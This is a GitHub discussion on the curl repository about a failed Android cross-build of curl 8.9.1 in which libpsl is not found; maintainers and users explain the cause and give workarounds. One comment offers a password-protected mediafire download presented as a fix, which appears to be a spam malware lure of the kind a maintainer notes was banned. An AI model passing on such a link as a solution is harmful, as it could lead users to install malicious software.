### DISCUSSION TITLE
configure: error: libpsl libs and/or directories were not found where specified!

### DISCUSSION THREAD

**Discussion by Ashish2000L** [curl/curl#14726] [Q&A]
### I did this

curl version:- 8.9.1

I am trying to build staic and shared file for android devices:-

`./configure --host=$TARGET \
        --prefix=$BUILD_PATH/curl/$ABI \
        --enable-static \
        --enable-shared \
        --disable-verbose \
        --enable-threaded-resolver \
        --enable-ipv6 \
        --without-ssl`
        
 but I am getting error that libpsl not found:
 `
>libtoolize: copying file './ltmain.sh'
libtoolize: putting macros in AC_CONFIG_MACRO_DIRS, 'm4'.
libtoolize: copying file 'm4/libtool.m4'
libtoolize: copying file 'm4/ltoptions.m4'
libtoolize: copying file 'm4/ltsugar.m4'
libtoolize: copying file 'm4/ltversion.m4'
libtoolize: copying file 'm4/lt~obsolete.m4'
libtoolize: Remember to add 'LT_INIT' to configure.ac.
configure.ac:125: installing './compile'
configure.ac:131: installing './missing'
docs/examples/Makefile.am: installing './depcomp'
configure: WARNING: unrecognized options: --with-psl
checking whether to enable maintainer-specific portions of Makefiles... no
checking whether make supports nested variables... yes
checking whether to enable debug build options... no
checking whether to enable compiler optimizer... (assumed) yes
checking whether to enable strict compiler warnings... no
checking whether to enable compiler warnings as errors... no
checking whether to enable curl debug memory tracking... no
checking whether to enable hiding of library internal symbols... yes
checking whether to enable c-ares for DNS lookups... no
checking whether to disable dependency on -lrt... (assumed no)
checking whether to enable HTTPSRR support... no
checking whether to enable ECH support... no
checking for path separator... :
checking for sed... /usr/bin/sed
checking for grep... /usr/bin/grep
checking that grep -E works... yes
checking for a BSD-compatible install... /usr/bin/install -c
checking for armv7a-linux-androideabi-gcc... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables... 
checking whether we are cross compiling... yes
checking for suffix of object files... o
checking whether the compiler supports GNU C... yes
checking whether /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang accepts -g... yes
checking for /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang option to enable C11 features... none needed
checking whether /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/lin yes86_64/bin/armv7a-linux-androideabi34-clang understands -c and -o together... 
checking how to run the C preprocessor... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang -E
checking for stdio.h... yes
checking for stdlib.h... yes
checking for string.h... yes
checking for inttypes.h... yes
checking for stdint.h... yes
checking for strings.h... yes
checking for sys/stat.h... yes
checking for sys/types.h... yes
checking for unistd.h... yes
checking for stdatomic.h... yes
checking if _Atomic is available... yes
checking for a sed that does not truncate output... (cached) /usr/bin/sed
checking for code coverage support... no
checking whether build environment is sane... yes
checking for armv7a-linux-androideabi-strip... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-strip
checking for a race-free mkdir -p... /usr/bin/mkdir -p
checking for gawk... no
checking for mawk... mawk
checking whether make sets $(MAKE)... yes
checking whether make supports the include directive... yes (GNU style)
checking dependency style of /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang... gcc3
checking curl version... 8.10.0-DEV
checking for httpd... no
checking for apache2... no
checking for apachectl... no
checking for apxs... no
configure: httpd/apache2 not in PATH, http tests disabled
configure: apxs not in PATH, http tests disabled
checking for nghttpx... no
checking for caddy... /usr/bin/caddy
checking build system type... x86_64-pc-linux-gnux32
checking host system type... armv7a-unknown-linux-androideabi
checking for grep that handles long lines and -e... (cached) /usr/bin/grep
checking for egrep... /usr/bin/grep -E
checking if OS is AIX (to define _ALL_SOURCE)... no
checking if _THREAD_SAFE is already defined... no
checking if _THREAD_SAFE is actually needed... no
checking if _THREAD_SAFE is onwards defined... no
checking if _REENTRANT is already defined... no
checking if _REENTRANT is actually needed... no
checking if _REENTRANT is onwards defined... no
checking for special C compiler options needed for large files... no
checking for _FILE_OFFSET_BITS value needed for large files... 64
checking how to print strings... printf
checking for a sed that does not truncate output... (cached) /usr/bin/sed
checking for fgrep... /usr/bin/grep -F
checking for ld used by /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/ld
checking if the linker (/home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/ld) is GNU ld... yes
checking for BSD- or MS-compatible name lister (nm)... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-nm
checking the name lister (/home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-nm) interface... BSD nm
checking whether ln -s works... yes
checking the maximum length of command line arguments... 1572864
checking how to convert x86_64-pc-linux-gnux32 file names to armv7a-unknown-linux-androideabi format... func_convert_file_noop
checking how to convert x86_64-pc-linux-gnux32 file names to toolchain format... func_convert_file_noop
checking for /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/ld option to reload object files... -r
checking for armv7a-linux-androideabi-objdump... no
checking for objdump... objdump
configure: WARNING: using cross tools not prefixed with host triplet
checking how to recognize dependent libraries... pass_all
checking for armv7a-linux-androideabi-dlltool... no
checking for dlltool... no
checking how to associate runtime and link libraries... printf %s\n
checking for armv7a-linux-androideabi-ar... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-ar
checking for archiver @FILE support... @
checking for armv7a-linux-androideabi-strip... (cached) /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-strip
checking for armv7a-linux-androideabi-ranlib... /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-ranlib
checking command to parse /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/llvm-nm output from /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang object... ok
checking for sysroot... no
checking for a working dd... /usr/bin/dd
checking how to truncate binary pipes... /usr/bin/dd bs=4096 count=1
checking for armv7a-linux-androideabi-mt... no
checking for mt... mt
checking if mt is a manifest tool... no
checking for dlfcn.h... yes
checking for objdir... .libs
checking if /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang supports -fno-rtti -fno-exceptions... yes
checking for /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang option to produce PIC... -fPIC -DPIC
checking if /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang PIC flag -fPIC -DPIC works... yes
checking if /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang static flag -static works... yes
checking if /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang supports -c -o file.o... yes
checking if /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang supports -c -o file.o... (cached) yes
checking whether the /home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi34-clang linker (/home/lavaworkid/android-ndk-r27//toolchains/llvm/prebuilt/linux-x86_64/bin/ld) supports shared libraries... yes
checking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... Android linker
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking whether to build static libraries... yes
checking whether to build shared libraries with -version-info... no
checking whether to build shared libraries with -no-undefined... no
checking whether to build shared libraries with -mimpure-text... no
checking whether to build shared libraries with PIC... yes
checking whether to build static libraries with PIC... no
checking whether to build shared libraries only... no
checking whether to build static libraries only... no
checking for armv7a-linux-androideabi-windres... no
checking for windres... no
checking if cpp -P is needed... no
checking if compiler is DEC/Compaq/HP C... no
checking if compiler is HP-UX C... no
checking if compiler is IBM C... no
checking if compiler is Intel C... no
checking if compiler is clang... yes
checking if compiler is xlclang... no
checking compiler version... clang '1800' (raw: 'Android (12027248, +pgo, +bolt, +lto, +mlgo, based on r522817) clang version 18.0.1 (https://android.googlesource.com/toolchain/llvm-project d8003a456d14a3deb8054cdaa529ffbf02d9b262)' / '18.0')
checking if compiler is GNU C... no
checking if compiler is SunPro C... no
checking if compiler is Tiny C... no
checking whether build target is a native Windows one... no
checking if compiler accepts some basic options... yes
configure: compiler options added: -Qunused-arguments -Werror-implicit-function-declaration 
checking if compiler optimizer assumed setting might be used... yes
checking if compiler accepts optimizer enabling options... yes
configure: compiler options added: -O2
checking if compiler halts on compilation errors... yes
checking if compiler halts on negative sized arrays... yes
checking if compiler halts on function prototype mismatch... yes
checking if compiler supports hiding library internal symbols... yes
checking whether build target supports Win32 file API... no
checking whether build target supports Win32 crypto API... no
checking for good-to-use Darwin CFLAGS... no
checking whether to support http... yes
checking whether to support ftp... yes
checking whether to support file... yes
checking whether to support ldap... yes
checking whether to support ldaps... yes
checking whether to support rtsp... yes
checking whether to support proxies... yes
checking whether to support dict... yes
checking whether to support telnet... yes
checking whether to support tftp... yes
checking whether to support pop3... yes
checking whether to support imap... yes
checking whether to support smb... yes
checking whether to support smtp... yes
checking whether to support gopher... yes
checking whether to support mqtt... no
checking whether to provide built-in manual... yes
checking whether to build documentation... yes
checking whether to enable generation of C code... yes
checking whether to use libgcc... no
checking if X/Open network library is required... no
checking for gethostbyname... yes
checking whether build target is a native Windows one... (cached) no
checking for proto/bsdsocket.h... no
checking for connect in libraries... yes
checking for sys/types.h... (cached) yes
checking for sys/time.h... yes
checking for monotonic clock_gettime... yes
checking for clock_gettime in libraries... no additional lib required
checking for sys/types.h... (cached) yes
checking for sys/time.h... (cached) yes
checking for raw monotonic clock_gettime... yes
checking for armv7a-linux-androideabi-pkg-config... no
checking for pkg-config... /usr/bin/pkg-config
checking for zlib options with pkg-config... found
checking for zlib.h... yes
configure: found both libz and libz.h header
checking for BrotliDecoderDecompress in -lbrotlidec... no
checking for brotli/decode.h... no
checking for ZSTD_createDStream in -lzstd... no
checking for zstd.h... no
checking for lber.h... no
checking for ldap.h... no
checking for ldap_ssl.h... no
checking for LDAP libraries... cannot find LDAP libraries
configure: WARNING: Cannot find libraries for LDAP support: LDAP disabled
checking whether to enable IPv6... yes
checking if struct sockaddr_in6 has sin6_scope_id member... yes
checking if argv can be written to... no
configure: WARNING: the previous check could not be made default was used
checking if GSS-API support is requested... no
checking whether to enable Windows native SSL/TLS... no
checking whether to enable Secure Transport... no
checking whether to enable Amiga native SSL/TLS (AmiSSL v5)... no
checking for armv7a-linux-androideabi-pkg-config... /usr/bin/pkg-config
checking for libpsl options with pkg-config... found
checking for psl_builtin in -lpsl... no
configure: error: libpsl libs and/or directories were not found where specified!
Error building curl library`

I have already installed psl from 
`sudo apt-get install libpsl-dev
`

I have set the package path in environment:-
`export PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig`

I have also checked if it is able to find the libpsl or not using:
`pkg-config --libs libpsl
`
it is returning:-
>-lpsl

[android_build_curl.txt](https://github.com/user-attachments/files/16777322/android_build_curl.txt)
this is the script I am using to build the curl package.

### I expected the following

it should build the static and shared libraries.

### curl/libcurl version

curl 8.9.1

### operating system

Linux 6.1.100+ x86_64

**Comment by dfandrich** [comment]
You don't say what host you're running this on, but it's unlikely that the libpsl-dev you installed is the Android version, but rather the version for your host computer.

**Comment by Ashish2000L** [comment]
@dfandrich 

are these links the real solution?

**Comment by bagder** [comment]
@Ashish2000L no, they are some sort of spam bots. They have been reported, the users banned and their comments should disappear soon.

**Edit:** the spam users and comments are removed.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ashish2000L** [comment]
@bagder 

Any idea why is this issue coming while making a build

**Comment by bagder** [comment]
@Ashish2000L because as @dfandrich said, you installed libpsl with apt-get for your host environment, not your cross-build environment.

**Comment by Ashish2000L** [comment]
can you explain what I need to do to solve this issue? @bagder

**Comment by bagder** [comment]
Two options:
1. install libpsl in your target environment so that configure can find it
2. disable libpsl in your cross-build with `--without-libpsl`

**Comment by Ashish2000L** [comment]
@bagder I have built the libpsl and added the generated .so file in 
$NDK_ROOT/toolchains/llvm/prebuilt/$host-x86_64/sysroot/usr/bin/$ABI/$API
and header in 
$NDK_ROOT/toolchains/llvm/prebuilt/$host-x86_64/sysroot/usr/include/$ABI/$API
this should detect the same, but it is still not detecting.

**Comment by dfandrich** [comment]
You didn't say what you did to point configure at that location.  You should
have either set PKG_CONFIG_PATH to its .pc file directory or used
--with-libpsl= to set the location of its install directory.

**Comment by Ashish2000L** [comment]
@dfandrich 
> You didn't say what you did to point configure at that location. You should have either set PKG_CONFIG_PATH to its .pc file directory or used --with-libpsl= to set the location of its install directory.

I have already explained that I have set the PKG_CONFIG_PATH to 

export PKG_CONFIG_PATH=/usr/lib/x86_64-linux-gnu/pkgconfig

and I have checked that libpsl.pc file already present in the same, either it is not looking to the file directory.

>checking for armv7a-linux-androideabi-pkg-config... /usr/bin/pkg-config
checking for libpsl options with pkg-config... found
checking for psl_builtin in -lpsl... no

in this it is finding pkg-config at /usr/bin/pkg-config, i have checked in the system there is no such path exists in the system if it is taking from the system root. 
Can you explain which pkg-config it is looking at so that I can make the changes according.

**Comment by dfandrich** [comment]
/usr/lib/x86_64-linux-gnu/pkgconfig doesn't sounds like a location that would
hold Android binaries, which is what an Android compiler would need. configure
is looking for a pkg-config binary customized for your toolchain, but it seems
to use the system one if it can't find a custom one. But setting
PKG_CONFIG_PATH to a path holding .pc files for Android should still work.

**Comment by Ashish2000L** [comment]
@dfandrich 

I have built the libpsl using ndk, can you specify path to which I need to place libpsl.pc so that it can be better identified when building project
<img width="719" alt="Screenshot 2024-08-29 121534" src="https://github.com/user-attachments/assets/b80534f8-1976-43dc-a5bd-473d5856fd79">
I have tried setting this path in PKG_CONFIG_PATH but it was still not working.

**Reply by yongfengnice** [reply]
can you tell how to  build the libpsl using ndk? I build libpsl fail

**Comment by FukataSeiya** [comment]
Have you resolved this issue yet? If not, please try downgrading the curl version. I was cross-compiling openssl for Android and faced a similar problem when using curl version 8.10.0, but I was able to make it work by using curl version 7.86.0.

**Reply by bagder** [reply]
That probably just meant that you build without libpsl, which is the equivalent of using `configure --without-libpsl` with the latest curl.

**Reply by FukataSeiya** [reply]
@bagder 
Thank you for your comment. 
Are there any issues with building without libpsl?

**Reply by yongfengnice** [reply]
I follow this website(https://mesonbuild.com/Cross-compilation.html) to compile libpsl success first,then pass --with-libpsl to refer the libpsl dir,o you can pass --without-libpsl to ignore it

**Reply by yongfengnice** [reply]
> I follow this website(https://mesonbuild.com/Cross-compilation.html) to compile libpsl success first,then pass --with-libpsl to refer the libpsl dir,o you can pass --without-libpsl to ignore it
libpsl website : https://www.linuxfromscratch.org/blfs/view/svn/basicnet/libpsl.html

**Reply by FukataSeiya** [reply]
@yongfengnice 
Thank you for your help! I will try the method you suggested.

**Comment by tjayz** [comment]
Building with meson works but is not required. I had same exact problem and was curious why it finds meson vs standard ./configure build and the answer lies in the .pc created dependant upon what libs psl finds and uses during install ofc but this is what my builds resulted in.

Meson
`Libs: -L${libdir} -lpsl -lidn2 -lunistring -lws2_32 -liconv`
Standard  ./configure
`Libs: -L${libdir} -lpsl `

Solution is to do this after build
`sed -i.bak "s/Libs: .*/& -lidn2 -lunistring -lws2_32 -liconv/" "$PKG_CONFIG_PATH/libpsl.pc"`

**Comment by esdrasdemorais** [comment]
./configure --with-gnutls --with-openssl --without-libpsl worked here

**Comment by djassie** [comment]
++ working
````bash
sudo apt-get install libpsl-dev 
````
